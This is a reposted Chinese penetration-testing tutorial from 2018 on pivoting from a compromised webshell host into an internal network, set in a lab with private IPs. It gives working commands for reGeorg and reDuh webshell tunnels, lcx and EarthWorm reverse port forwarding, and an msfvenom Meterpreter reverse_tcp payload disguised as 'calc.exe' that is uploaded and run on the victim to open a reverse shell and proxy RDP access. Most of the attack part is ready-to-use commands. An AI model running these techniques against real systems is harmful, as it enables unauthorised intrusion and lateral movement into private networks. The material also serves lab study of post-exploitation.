当渗透遇到webshell机器为内网ip可以这样做
时间:2018-03-21 11:25 来源:转载 作者:duolaoa 点击:次
实验环境
Win10(192.168.0.110) Kali2(192.168.174.197)
Win2008(192.168.174.192)
Win7(192.168.174.200) 代理工具Regeorg上传tunnel.php到192.168.174.192网站目录下 http://192.168.174.192/tunnel.php 脚本正常运行如下图:
有时候出现报错,可以使用tunnel.nosocket.php 在192.168.0.110上启用本地代理,命令如下: python reGeorgSocksProxy.py -p 1234 -u http://192.168.174.192/tunnel.php 如下图:
此时可以通过192.168.0.110的127.0.0.1:1234代理访问192.168.174.192/24网络的全部端口,通过regeorg工具,将远程桌面连接的代理设置为127.0.0.1:1234,如下图:
使用127.0.0.1:1234代理访问192.168.174.200的3389,如下图:
如果攻击者机器是linux,可以使用proxychains代替proxifier。 reDuh上传reDuh.php到192.168.174.192网站目录下 http://192.168.174.192/reDuh.php 脚本正常运行如下图:
运行gui工具,将192.168.174.200:3389代理到本地127.0.0.1:4444,如下图所示:
使用远程桌面连接工具连接127.0.0.1:4444,即可访问192.168.174.200:3389,如下图:
Lcx 上传lcx.exe到192.168.0.110(必须公网ip)的目录下,执行 Lcx.exe –listen5115 33891 5115端口监听流量并转发到33891端口,如下图:
上传lcx.exe到192.168.174.192目录下,执行 lcx.exe -slave192.168.0.110 5115 192.168.174.200 3389 将192.168.174.200的3389流量转发到192.168.0.110(必须公网ip)上,如下图:
此时攻击者机器与个人pc建立连接,如下图:
使用远程桌面连接工具连接127.0.0.1:33981端口,即可远程访问192.168.174.200:3389,如下图:
Ew 上传ew.exe到192.168.0.110(必须是公网ip)的目录下,执行 ew -s rcsocks-l1234 -e 8888 在192.168.0.110上添加转接隧道,将1234 收到的代理请求转交给反连 8888 端口的主机,如下图:
上传ew.exe到192.168.174.192目录下,执行 ew -s rssocks -d192.168.0.110 -e 8888 将192.168.174.192的流量反向连接到192.168.0.110上,如下图:
此时192.168.0.110上回出现连接建立成功字样,如下图:
使用regeorg工具将远程桌面连接的代理设置为127.0.0.1:1234,即可访问192.168.174.200:3389,如下图:
Msf 使用msfvenom生成反向连接exe程序,反向连接的目的机器为192.168.174.197(必须是公网ip),命令如下: msfvenom-pwindows/x64/meterpreter/reverse_tcp lhost=192.168.174.197 lport=4444 -f exe > calc.exe
同时启动msf监听流量并进行如下配置,如下图:
将反向连接程序calc.exe上传到192.168.174.192上,并执行,此时msf会完成回话连接,如下图:
将192.168.174.192/24路由添加到msf中,如下图:
在msf上建立socks4a代理,代理监听的默认端口是1080,配置如下图:
使用profixier工具,将远程桌面连接的工具的代理设置为192.168.174.197:1080,如下图:
在192.168.0.110上即可通过远程桌面连接工具访问192.168.174.200:3389,如下图:
备注除开以上5种还有ssh隧道、远控、teamviewer、tunna(不太稳定)等,可以根据实际情况进行利用或者测试。 (责任编辑:蜗蜗侠) |